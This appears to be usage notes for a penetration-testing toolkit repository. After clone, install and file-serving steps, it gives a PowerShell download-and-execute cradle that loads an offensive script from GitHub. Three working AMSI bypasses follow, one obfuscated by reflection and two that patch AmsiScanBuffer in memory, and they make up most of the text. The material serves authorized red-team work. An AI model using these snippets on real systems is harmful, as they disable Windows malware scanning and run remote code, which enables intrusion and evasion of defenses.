- Clone the repo locally
git clone https://github.com/lefayjey/PentestTools
- (Optional) Update tools using install script
cd PentestTools
chmod +x install.sh
./install.sh
- Run HTTP or SMB servers
python3 -m http.server 8000 --directory /opt/PentestTools/
python3 smbserver.py SHARE /opt/PentestTools/ -smb2 -username <user> -password <pass>
- Load scripts
. .\Offline_WinPwn.ps1
Import-Module \\<Kali_IP>\Offline_WinPwn.ps1
https://raw.githubusercontent.com/lefayjey/PentestTools/master/<folder>/<script_binary>
Examples:
IEX ((new-object net.webclient).DownloadString('https://raw.githubusercontent.com/lefayjey/PentestTools/master/windows/Offline_WinPwn.ps1'))
$A="5492868772801748688168747280728187173688878280688776"
$B="8281173680867656877679866880867644817687416876797271"
function C($n, $m){
[string]($n..$m|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " "}
$k=C 0 37; $r=C 38 51
$a=[Ref].Assembly.GetType($k)
$a.GetField($r,'NonPublic,Static').SetValue($null,$true)
or
Function Invoke-NETFaramoose{
function lf{param($m,$f)$a=[AppDomain]::CurrentDomain.GetAssemblies()|?{$_.GlobalAssemblyCache-and$_.Location.Split('\')[-1]-eq'System.dll'}|%{$_.'GetType'('Microsoft.Win32.UnsafeNativeMethods')}
$t=$a.'GetMethods'()|?{$_.Name-like'Ge*P*oc*ddress'}
$t[0].'Invoke'($null,@(($a.'GetMethod'('GetModuleHandle')).'Invoke'($null,@($m)),$f))}
function g{Param($f,$d=[Void])$t=[AppDomain]::CurrentDomain.DefineDynamicAssembly([System.Reflection.AssemblyName]'R',[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I',$false).DefineType('M','Class,Public,Sealed,AnsiClass,AutoClass',[System.MulticastDelegate])
$t.DefineConstructor('RTSpecialName,HideBySig,Public',[System.Reflection.CallingConventions]::Standard,$f).SetImplementationFlags('Runtime,Managed')
$t.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$d,$f).SetImplementationFlags('Runtime,Managed')
return $t.CreateType()}
$a="A";$b="msiS";$c="canB";$d="uffer"
[IntPtr]$f=lf amsi.dll ($a+$b+$c+$d);$o=0
$vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((lf kernel32.dll VirtualProtect),(g @([IntPtr],[UInt32],[UInt32],[UInt32].MakeByRefType())([Bool])))
$vp.Invoke($f,3,0x40,[ref]$o)>$null
$b=[Byte[]](0xb8,0x34,0x12,0x07,0x80,0x66,0xb8,0x32,0x00,0xb0,0x57,0xc3)
[System.Runtime.InteropServices.Marshal]::Copy($b,0,$f,12)}
Invoke-NETFaramoose
or
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)